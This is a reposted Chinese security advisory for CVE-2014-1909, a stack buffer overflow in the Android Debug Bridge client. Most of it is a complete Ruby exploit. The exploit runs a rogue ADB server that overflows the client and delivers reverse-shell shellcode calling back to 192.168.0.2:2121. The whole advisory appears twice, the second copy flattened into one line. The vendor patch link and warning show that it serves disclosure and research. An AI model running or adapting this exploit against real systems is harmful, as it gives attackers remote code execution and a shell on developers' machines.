Android SDK 平台工具签名错误栈缓冲区溢出漏洞
时间:2014-02-21 13:06 来源:www.it.net.cn 作者:IT网
发布日期:2014-02-04
更新日期:2014-02-15
受影响系统:
Android SDK
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65403
CVE(CAN) ID: CVE-2014-1909
Android SDK Platform Tool是Android设备的开发软件包。
Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
<*来源:Joshua J. Drake
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'socket'
require 'uri'
puts "[*] Exploit for ADB client stack buffer overflow -jduck"
# linux/x86/shell_reverse_tcp - 90 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependFork=true, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=true, InitialAutoRunScript=, AutoRunScript=
payload =
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd" +
"\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" +
"\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8" +
"\x00\x02\x68\x02\x00\x08\x49\x89\xe1\xb0\x66\x50\x51\x53" +
"\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f" +
"\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +
"\xdb\x6a\x01\x58\xcd\x80"
def read_request(cli)
len = cli.recv(4)
len = len.to_i(16)
puts "[*] request length: #{len}"
buf = cli.recv(len)
puts "[*] request: #{buf.inspect}"
buf
end
srv = TCPServer.new 5037
loop {
puts "[*] Waiting for client..."
cli = srv.accept
puts "[*] Accepted client"
req = read_request(cli)
if req != "host:version"
puts "[-] incorrect request!"
next
end
res = "OKAY"
res << "-fff"
res << ("A" * 112) # padding
# popped registers
res << [
0xc0c00004, # ebx
0xc0c00008, # esi
0xc0c0000c, # edi
0xc0c00010, # ebp
#0x0810efd3, # eip - int 3 / ret
0x812a14b, # eip - jmp esp
].pack('V*')
res << payload
puts "[*] Sending response (0x%x bytes)" % res.length
cli.write(res)
cli.close
}
srv.close
建议:
--------------------------------------------------------------------------------
厂商补丁:
Android
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.openhandsetalliance.com/android_overview.html
(责任编辑:IT)
| 发布日期:2014-02-04 更新日期:2014-02-15 受影响系统: Android SDK 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 65403 CVE(CAN) ID: CVE-2014-1909 Android SDK Platform Tool是Android设备的开发软件包。 Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。 <*来源:Joshua J. Drake *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! #!/usr/bin/env ruby # -*- coding: binary -*- require 'socket' require 'uri' puts "[*] Exploit for ADB client stack buffer overflow -jduck" # linux/x86/shell_reverse_tcp - 90 bytes # http://www.metasploit.com # VERBOSE=false, LHOST=192.168.0.2, LPORT=2121, # ReverseConnectRetries=5, ReverseAllowProxy=false, # PrependFork=true, PrependSetresuid=false, # PrependSetreuid=false, PrependSetuid=false, # PrependSetresgid=false, PrependSetregid=false, # PrependSetgid=false, PrependChrootBreak=false, # AppendExit=true, InitialAutoRunScript=, AutoRunScript= payload = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd" + "\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" + "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8" + "\x00\x02\x68\x02\x00\x08\x49\x89\xe1\xb0\x66\x50\x51\x53" + "\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f" + "\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31" + "\xdb\x6a\x01\x58\xcd\x80" def read_request(cli) len = cli.recv(4) len = len.to_i(16) puts "[*] request length: #{len}" buf = cli.recv(len) puts "[*] request: #{buf.inspect}" buf end srv = TCPServer.new 5037 loop { puts "[*] Waiting for client..." cli = srv.accept puts "[*] Accepted client" req = read_request(cli) if req != "host:version" puts "[-] incorrect request!" next end res = "OKAY" res << "-fff" res << ("A" * 112) # padding # popped registers res << [ 0xc0c00004, # ebx 0xc0c00008, # esi 0xc0c0000c, # edi 0xc0c00010, # ebp #0x0810efd3, # eip - int 3 / ret 0x812a14b, # eip - jmp esp ].pack('V*') res << payload puts "[*] Sending response (0x%x bytes)" % res.length cli.write(res) cli.close } srv.close 建议: -------------------------------------------------------------------------------- 厂商补丁: Android ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.openhandsetalliance.com/android_overview.html (责任编辑:IT) |